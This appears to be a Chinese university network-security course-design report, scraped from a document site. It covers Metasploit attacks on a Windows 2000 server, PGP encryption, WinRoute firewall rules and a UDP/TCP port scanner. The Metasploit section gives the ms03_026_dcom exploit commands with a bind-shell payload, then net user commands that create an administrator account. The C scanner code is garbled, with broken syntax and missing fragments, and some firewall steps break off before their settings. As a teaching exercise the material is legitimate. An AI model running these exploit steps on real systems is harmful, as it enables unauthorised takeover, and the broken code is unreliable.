网络安全课程设计

网络安全是网络工程专业核心专业课程，是理论与实践并重的课程。本课程设计目的是在网络安全课程基础上，熟悉网络安全的架构方法，达到熟练分析网络隐患的技能，能够利用所学的基本知识和技能，解决常见的安全隐患，并设计出相对安全的网络系统规则。要求学生运用所学的网络安全基本知识、基本原理和技能，根据需求完成网络环境的选择与配置，对网络攻防进行验证和设计，培养学生对网络安全技术的应用能力，增强网络安全意识。

在本次课程设计中，要求能够利用metasploit攻击一台装有iis5.0的windows 2000服务器，获得其控制权，并且在其上面建立超级用户；使用pgp加密文件、加密邮件；利用winroute对你的主机设置禁用ping探测、禁用ftp访问及禁用http访问；并且实现对端口的扫描。

1）利用metasploit攻击一台装有iis5.0的windows 2000服务器，获得其控制权，并且在其上面建立超级用户，写出整个实施过程。

1、安装metasploit软件，安装完成后打开软件的控制台窗口。

2、在窗口控制台界面输入命令“info exploit/windows/dcerpc/ms03_026_dcom”以了解该命令的用法。

3、输入命令“use exploit/windows/dcerpc/ms03_026_dcom”使用该程序。

4、输入命令“set rhost 目的主机ip地址”

5、输入命令“set payload generic/shell_bind_tcp”加载运行程序需要的shellcode

6、输入命令“exploit”执行。

7、现在已经进入了目的主机的dos控制界面，输入命令“net user 用户名密码 / add”添加用户。

输入命令“net localgroup 用户名 /add”将用户添加到管理员组。

2）使用pgp 加密文件、加密邮件，写出详细的实施过程。

1、安装pgp软件，在安装中选中“no，i’m a new user”然后“next”至电脑重启。

2、由于是第一次安装运行该软件，电脑重启后该软件会自动提示你建立pgp密钥。

3、点击按钮“下一步”，在用户信息对话框中输入相应的姓名和电子邮件地址。

4、在pgp密码输入框中输入8位以上的密码并确认，然后pgp会自动产生pgp密钥。

5、使用pgp可以加密本地文件，右击要加密的文件，选择pgp菜单项的菜单“encrypt”

6、系统自动出现对话框，让用户选择要使用的加密密钥，选中一个密钥，点击按钮“ok”

7、加密邮件：打开outlook，利用outlook建立邮件，可以选择利用pgp进行加密和签名。

3）利用winroute对你的主机设置禁用ping探测、禁用ftp访问及禁用http访问，写出详细的实施过程。

1、安装winroute软件，安装完成后。以管理员身份运行该软件，初始密码为空。

2、该软件运行后，主机将不能上网，点击工具栏图标，出现本地网络设置对话框，然后查看“ethernet”的属性，将两个复选框全部选中。

3、开始创建规则：选择菜单项“packet filter”，选中网卡，右击创建新规则，出现过滤规则添加对话框。

4、因为“ping”指令用的协议是icmp，所以这里要对icmp协议设置过滤规则。在协议下拉列表中选择“icmp”

5、在“icmp type”栏目中，将复选框全部选中。在“action”栏目中，选择单选框“drop”。在“log packet”栏目中选中“log into window”，创建完毕后点击按钮“ok”，一条规则就创建完毕。

6、在物理机上“ping”虚拟机后，再选择菜单栏“view”下的菜单项“logs>security logs”，察看日志纪录。

7、ftp服务用tcp协议， ftp占用tcp的21端口，配置如下：

8. http服务用tcp协议，占用tcp协议的80端口，配置如下：

9、完成后在物理机用浏览器访问虚拟机，查看日志记录：

4）实现端口扫描的程序可以使用tcp协议和udp协议，原理是通过socket连接对方的计算机的某端口，试图和该端口建立连接，如果建立成功，就说明对方开放了该端口，如果失败了，就说明对方没有开放该端口，利用udp协议实现端口扫描（写出程序**）。

#include <>

#define bufsize64

#define wsvers makeword(2, 0)

#define winepoch 2208988800

#define msg "is this port you open?"

#define max_packet 1024

socket connectsock(const char *host, const char *service,const char *transport );

void errexit(const char *,

int main(int argc, char *ar**)

char *host = localhost"; host to use if none supplied */

char *service = 5060"; default service name

socket ssocket descriptor

int errcnt = 0error count */

wsadata wsadata;

switch (argc)

if (wsastartup(wsvers, &wsadata))

errexit("wsastartup failed");

s = connectsock(host, service, "tcp");

(void) send(s, msg, strlen(msg), 0);

closesocket(s);

wsacleanup();

return 1;

#ifndef inaddr_none

#define inaddr_none 0xffffffff

#endif /*inaddr_none */

connectsock - allocate & connect a socket using tcp or udp

socket connectsock(const char *host, const char *service, const char *transport )

struct hostent *phe; /pointer to host information entry */

struct servent *pse; /pointer to service information entry */

struct protoent *ppe; /pointer to protocol information entry*/

struct sockaddr_in sin; /an internet endpoint address

int s, type; /socket descriptor and socket type */

memset(&sin, 0, sizeof(sin));

= af_inet;

/* map service name to port number */

if ( pse = getservbyname(service, transport) )

= pse->s_port;

else if ( htons((u_short)atoi(service)))0 )

errexit("can't get \"s\" service entry", service);

/* map host name to ip address, allowing for dotted decimal */

if ( phe = gethostbyname(host) )

memcpy(& phe->h_addr, phe->h_length);

else if ( inet_addr(host)) inaddr_none)

errexit("can't get \"s\" host entry", host);

/* map protocol name to protocol number */

if ( ppe = getprotobyname(transport)) 0)

errexit("can't get \"s\" protocol entry", transport);

/* use protocol to choose a socket type */

if (strcmp(transport, "udp") 0)

type = sock_dgram;

elsetype = sock_stream;

网络安全课程设计

网络协议DHCP协议分析课程设计

课程设计总结

课程设计总结

课程设计报告

课程设计总结

课程设计总结

课程设计总结

课程设计个人总结

其他用户还读了